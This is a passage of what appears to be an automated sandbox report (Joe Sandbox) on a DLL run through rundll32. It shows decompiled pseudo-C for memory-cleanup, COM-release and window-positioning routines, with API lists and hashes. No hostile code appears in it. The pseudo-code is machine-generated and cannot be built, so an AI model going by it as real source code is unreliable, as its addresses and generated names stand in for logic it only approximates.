                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L5:
                                                                                                            							_t96 =  *0x1004b0dc; // 0x0
                                                                                                            							_t177 =  *0x1004b0e8; // 0x0
                                                                                                            							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
                                                                                                            								_t189 =  *0x1004b0e4; // 0x0
                                                                                                            								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
                                                                                                            								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
                                                                                                            								_t142 =  *0x1004b0d8; // 0x0
                                                                                                            								_t159 =  *0x1004b0ec; // 0x0
                                                                                                            								_t125 =  *0x1004b0e0; // 0x0
                                                                                                            								_t96 =  *0x1004b0dc; // 0x0
                                                                                                            								_t196 = _t196 + 8;
                                                                                                            							}
                                                                                                            							_t61 =  *0x1004b0e4; // 0x0
                                                                                                            							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
                                                                                                            							_t37 = _t125 + 1; // 0x1
                                                                                                            						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t51;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@Heap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 834397476-0
                                                                                                            • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                                                            • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr* _t87;
                                                                                                            				intOrPtr* _t88;
                                                                                                            				intOrPtr _t89;
                                                                                                            				intOrPtr* _t90;
                                                                                                            				void* _t91;
                                                                                                            				intOrPtr _t104;
                                                                                                            				intOrPtr* _t121;
                                                                                                            				intOrPtr* _t122;
                                                                                                            				intOrPtr* _t124;
                                                                                                            				intOrPtr* _t126;
                                                                                                            				intOrPtr* _t128;
                                                                                                            				intOrPtr* _t130;
                                                                                                            				intOrPtr* _t148;
                                                                                                            				intOrPtr* _t161;
                                                                                                            				intOrPtr _t162;
                                                                                                            				intOrPtr _t163;
                                                                                                            				void* _t165;
                                                                                                            				intOrPtr _t167;
                                                                                                            				intOrPtr* _t168;
                                                                                                            				void* _t170;
                                                                                                            				intOrPtr _t183;
                                                                                                            
                                                                                                            				_t161 = __edi;
                                                                                                            				E10011BF0(0x1003af91, _t170);
                                                                                                            				_t167 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
                                                                                                            				 *((intOrPtr*)(__ecx)) = 0x1004060c;
                                                                                                            				 *(_t170 - 4) = 0;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                            					_t121 =  *((intOrPtr*)(__ecx + 0x50));
                                                                                                            					if(_t121 != 0) {
                                                                                                            						_t122 =  *_t121;
                                                                                                            						_push(_t170 - 0x14);
                                                                                                            						_push(0x10043208);
                                                                                                            						_push(_t122);
                                                                                                            						if( *((intOrPtr*)( *_t122))() >= 0) {
                                                                                                            							_t124 =  *((intOrPtr*)(_t170 - 0x14));
                                                                                                            							_push(_t170 - 0x10);
                                                                                                            							_push(0x10043348);
                                                                                                            							 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                                                            							_push(_t124);
                                                                                                            							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
                                                                                                            								_t128 =  *((intOrPtr*)(_t170 - 0x10));
                                                                                                            								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
                                                                                                            								_t130 =  *((intOrPtr*)(_t170 - 0x10));
                                                                                                            								 *((intOrPtr*)( *_t130 + 8))(_t130);
                                                                                                            							}
                                                                                                            							_t126 =  *((intOrPtr*)(_t170 - 0x14));
                                                                                                            							 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_push(_t161);
                                                                                                            				L8:
                                                                                                            				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
                                                                                                            					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
                                                                                                            					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
                                                                                                            				E1001E047(_t167 + 0x18);
                                                                                                            				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
                                                                                                            					L16:
                                                                                                            					_t87 =  *((intOrPtr*)(_t167 + 8));
                                                                                                            					if(_t87 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t87 + 8))(_t87);
                                                                                                            					}
                                                                                                            					_t88 =  *((intOrPtr*)(_t167 + 0xc));
                                                                                                            					if(_t88 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                            					}
                                                                                                            					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
                                                                                                            						L29:
                                                                                                            						_t89 =  *((intOrPtr*)(_t167 + 0x34));
                                                                                                            						if(_t89 != 0) {
                                                                                                            							__imp__CoTaskMemFree(_t89);
                                                                                                            						}
                                                                                                            						_t138 =  *((intOrPtr*)(_t167 + 0x54));
                                                                                                            						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
                                                                                                            							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
                                                                                                            							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
                                                                                                            						}
                                                                                                            						_t162 =  *((intOrPtr*)(_t167 + 0x54));
                                                                                                            						_t195 = _t162;
                                                                                                            						if(_t162 != 0) {
                                                                                                            							E10009EC5(_t162);
                                                                                                            							_push(_t162);
                                                                                                            							L1001F7A9(0, _t162, _t167, _t195);
                                                                                                            						}
                                                                                                            						_t163 =  *((intOrPtr*)(_t167 + 0x50));
                                                                                                            						_t196 = _t163;
                                                                                                            						if(_t163 != 0) {
                                                                                                            							E1000E731(_t163, _t196);
                                                                                                            							_push(_t163);
                                                                                                            							L1001F7A9(0, _t163, _t167, _t196);
                                                                                                            						}
                                                                                                            						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
                                                                                                            						if(_t90 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t90 + 8))(_t90);
                                                                                                            						}
                                                                                                            						_t168 =  *((intOrPtr*)(_t167 + 0x48));
                                                                                                            						if(_t168 != 0) {
                                                                                                            							 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                                                            						}
                                                                                                            						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
                                                                                                            						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
                                                                                                            						return _t91;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                                                            						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
                                                                                                            							L28:
                                                                                                            							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
                                                                                                            							goto L29;
                                                                                                            						}
                                                                                                            						_t165 = 0;
                                                                                                            						do {
                                                                                                            							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
                                                                                                            							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
                                                                                                            							if(_t104 == 0) {
                                                                                                            								goto L25;
                                                                                                            							} else {
                                                                                                            								goto L24;
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								L24:
                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
                                                                                                            							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
                                                                                                            							L25:
                                                                                                            							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
                                                                                                            							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
                                                                                                            							if(_t148 != 0) {
                                                                                                            								 *((intOrPtr*)( *_t148 + 4))(1);
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
                                                                                                            							_t165 = _t165 + 0x28;
                                                                                                            						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
                                                                                                            						goto L28;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t161 = 0;
                                                                                                            				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
                                                                                                            					L14:
                                                                                                            					if(_t183 != 0) {
                                                                                                            						_push( *((intOrPtr*)(_t167 + 0x3c)));
                                                                                                            						L1001F7A9(0, _t161, _t167, _t183);
                                                                                                            						_push( *((intOrPtr*)(_t167 + 0x40)));
                                                                                                            						L1001F7A9(0, _t161, _t167, _t183);
                                                                                                            					}
                                                                                                            					goto L16;
                                                                                                            				}
                                                                                                            				 *((intOrPtr*)(_t170 - 0x10)) = 0;
                                                                                                            				do {
                                                                                                            					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
                                                                                                            					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
                                                                                                            					_t161 = _t161 + 1;
                                                                                                            				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
                                                                                                            				_t183 =  *((intOrPtr*)(_t167 + 0x38));
                                                                                                            				goto L14;
                                                                                                            			}


























                                                                                                            0x1000ea9b
                                                                                                            0x1000ea9b
                                                                                                            0x1000ea9e
                                                                                                            0x1000eaa3
                                                                                                            0x1000eaa8
                                                                                                            0x1000eaa8
                                                                                                            0x1000eaae
                                                                                                            0x1000eb1d
                                                                                                            0x1000eb1d
                                                                                                            0x1000eb22
                                                                                                            0x1000eb25
                                                                                                            0x1000eb25
                                                                                                            0x1000eb2b
                                                                                                            0x1000eb30
                                                                                                            0x1000eb37
                                                                                                            0x1000eb3f
                                                                                                            0x1000eb3f
                                                                                                            0x1000eb44
                                                                                                            0x1000eb47
                                                                                                            0x1000eb49
                                                                                                            0x1000eb4d
                                                                                                            0x1000eb52
                                                                                                            0x1000eb53
                                                                                                            0x1000eb58
                                                                                                            0x1000eb59
                                                                                                            0x1000eb5c
                                                                                                            0x1000eb5e
                                                                                                            0x1000eb62
                                                                                                            0x1000eb67
                                                                                                            0x1000eb68
                                                                                                            0x1000eb6d
                                                                                                            0x1000eb6e
                                                                                                            0x1000eb74
                                                                                                            0x1000eb79
                                                                                                            0x1000eb79
                                                                                                            0x1000eb7c
                                                                                                            0x1000eb81
                                                                                                            0x1000eb86
                                                                                                            0x1000eb86
                                                                                                            0x1000eb8c
                                                                                                            0x1000eb90
                                                                                                            0x1000eb9a
                                                                                                            0x1000eba2
                                                                                                            0x1000eab0
                                                                                                            0x1000eab3
                                                                                                            0x1000eab6
                                                                                                            0x1000eb14
                                                                                                            0x1000eb17
                                                                                                            0x00000000
                                                                                                            0x1000eb17
                                                                                                            0x1000eab8
                                                                                                            0x1000eaba
                                                                                                            0x1000eac1
                                                                                                            0x1000eac6
                                                                                                            0x1000eac9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000eacb
                                                                                                            0x1000eacb
                                                                                                            0x1000eae0
                                                                                                            0x1000eae0
                                                                                                            0x1000eae8
                                                                                                            0x1000eaef
                                                                                                            0x1000eaf7
                                                                                                            0x1000eafd
                                                                                                            0x1000eb03
                                                                                                            0x1000eb03
                                                                                                            0x1000eb06
                                                                                                            0x1000eb0c
                                                                                                            0x1000eb0f
                                                                                                            0x00000000
                                                                                                            0x1000eaba
                                                                                                            0x1000eaae
                                                                                                            0x1000ea59
                                                                                                            0x1000ea5e
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea7f
                                                                                                            0x1000ea82
                                                                                                            0x1000ea87
                                                                                                            0x1000ea8a
                                                                                                            0x1000ea90
                                                                                                            0x00000000
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea60
                                                                                                            0x1000ea63
                                                                                                            0x1000ea6a
                                                                                                            0x1000ea70
                                                                                                            0x1000ea74
                                                                                                            0x1000ea75
                                                                                                            0x1000ea7a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$ClearH_prologVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 82050969-0
                                                                                                            • Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
                                                                                                            • Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1000E58F(void* __ecx, void* __edx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				struct tagRECT _v40;
                                                                                                            				struct tagRECT _v56;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed int _t58;
                                                                                                            				intOrPtr _t60;
                                                                                                            				intOrPtr* _t62;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr _t66;
                                                                                                            				intOrPtr* _t67;
                                                                                                            				intOrPtr* _t69;
                                                                                                            				intOrPtr* _t71;
                                                                                                            				intOrPtr* _t73;
                                                                                                            				intOrPtr* _t84;
                                                                                                            				void* _t107;
                                                                                                            				void* _t126;
                                                                                                            				intOrPtr _t130;
                                                                                                            				intOrPtr* _t131;
                                                                                                            				intOrPtr* _t133;
                                                                                                            				intOrPtr* _t134;
                                                                                                            				void* _t135;
                                                                                                            				intOrPtr _t136;
                                                                                                            				void* _t137;
                                                                                                            
                                                                                                            				_t126 = __edx;
                                                                                                            				_t135 = __ecx;
                                                                                                            				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
                                                                                                            				_v12 = _t130;
                                                                                                            				_t58 = IsWindowVisible( *(_t130 + 0x1c));
                                                                                                            				asm("sbb eax, eax");
                                                                                                            				_t60 =  ~_t58 + 1;
                                                                                                            				_v24 = _t60;
                                                                                                            				_t107 = 0;
                                                                                                            				if(_t60 != 0) {
                                                                                                            					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
                                                                                                            					GetWindowRect( *(_t130 + 0x1c),  &_v40);
                                                                                                            					asm("cdq");
                                                                                                            					asm("cdq");
                                                                                                            					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
                                                                                                            					E100203AD(_t130, 1);
                                                                                                            				}
                                                                                                            				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                                                            				_t131 = _t135 + 0x48;
                                                                                                            				_push(_t131);
                                                                                                            				_push(0x100405f8);
                                                                                                            				_push(_t62);
                                                                                                            				if( *((intOrPtr*)( *_t62))() < 0) {
                                                                                                            					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                                                            					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
                                                                                                            					if(_t66 >= _t107) {
                                                                                                            						_t67 = _v16;
                                                                                                            						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
                                                                                                            						_t69 = _v16;
                                                                                                            						 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                                                            						_t71 = _v20;
                                                                                                            						if(_t71 != _t107) {
                                                                                                            							_t133 = _t135 + 8;
                                                                                                            							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
                                                                                                            							_t73 = _v20;
                                                                                                            							 *((intOrPtr*)( *_t73 + 8))(_t73);
                                                                                                            							_t66 = _v8;
                                                                                                            							if(_t66 >= _t107) {
                                                                                                            								_t134 =  *_t133;
                                                                                                            								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t66 = 0x80004005;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					_t84 =  *_t131;
                                                                                                            					_t134 = _t135 + 0x4c;
                                                                                                            					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
                                                                                                            					if( *_t134 == _t107) {
                                                                                                            						_v8 = 0x80004003;
                                                                                                            					}
                                                                                                            					if(_v8 >= _t107) {
                                                                                                            						L14:
                                                                                                            						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
                                                                                                            						if(_v24 != _t107) {
                                                                                                            							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                                                            							E100203AD(_v12, _t107);
                                                                                                            						}
                                                                                                            						_t66 = _t136;
                                                                                                            					} else {
                                                                                                            						if(_v24 != _t107) {
                                                                                                            							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                                                            							E100203AD(_v12, _t107);
                                                                                                            						}
                                                                                                            						_t66 = _v8;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t66;
                                                                                                            			}


































                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 1000E5AD
                                                                                                            • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                                                            • GetWindowRect.USER32 ref: 1000E5D3
                                                                                                            • GetWindowRect.USER32 ref: 1000E5E0
                                                                                                              • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                                                              • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$DesktopMoveShowVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3835705305-0
                                                                                                            • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                                                            • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                                                            • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				struct tagRECT _v28;
                                                                                                            				struct tagRECT _v44;
                                                                                                            				struct tagRECT _v60;
                                                                                                            				void* _t76;
                                                                                                            				int _t78;
                                                                                                            				intOrPtr _t83;
                                                                                                            				intOrPtr _t102;
                                                                                                            				int _t116;
                                                                                                            				void* _t124;
                                                                                                            				void* _t128;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t135;
                                                                                                            				void* _t139;
                                                                                                            
                                                                                                            				_t135 = __edi;
                                                                                                            				_t124 = __ecx;
                                                                                                            				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                            				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                            				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                                                            				_t139 = 2;
                                                                                                            				if(_t133 == 0xa) {
                                                                                                            					L7:
                                                                                                            					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
                                                                                                            					L9:
                                                                                                            					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
                                                                                                            					__eflags = _t78;
                                                                                                            					L10:
                                                                                                            					if(_t78 < 0) {
                                                                                                            						_t78 = 0;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
                                                                                                            					GetWindowRect(GetDesktopWindow(),  &_v44);
                                                                                                            					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsd");
                                                                                                            					if(_t83 == 0xa || _t83 == 0xc) {
                                                                                                            						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
                                                                                                            						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
                                                                                                            						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                            						if(__eflags != 0) {
                                                                                                            							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
                                                                                                            							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
                                                                                                            							__eflags = _t102;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
                                                                                                            							 *(_t124 + 0x48) = _v28.left;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
                                                                                                            						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
                                                                                                            						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                                                            						_t149 = _t116;
                                                                                                            						if(_t116 != 0) {
                                                                                                            							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
                                                                                                            							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(_t124 + 4)) = _a4;
                                                                                                            					 *((intOrPtr*)(_t124 + 8)) = _a8;
                                                                                                            					return E10030582(_t124, _t149, 0);
                                                                                                            				}
                                                                                                            				if(_t133 == 0xb) {
                                                                                                            					__eflags = _t133 - 0xa;
                                                                                                            					if(_t133 != 0xa) {
                                                                                                            						_t14 = __ecx + 0x30;
                                                                                                            						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
                                                                                                            						__eflags =  *_t14;
                                                                                                            						goto L9;
                                                                                                            					}
                                                                                                            					goto L7;
                                                                                                            				} else {
                                                                                                            					_t139 = 0x22;
                                                                                                            					if(_t133 != 0xc) {
                                                                                                            						_t8 = __ecx + 0x34;
                                                                                                            						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
                                                                                                            						__eflags =  *_t8;
                                                                                                            					} else {
                                                                                                            						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
                                                                                                            					}
                                                                                                            					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$IntersectWindow$Desktop
                                                                                                            • String ID:
                                                                                                            • API String ID: 123605412-0
                                                                                                            • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                                                            • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
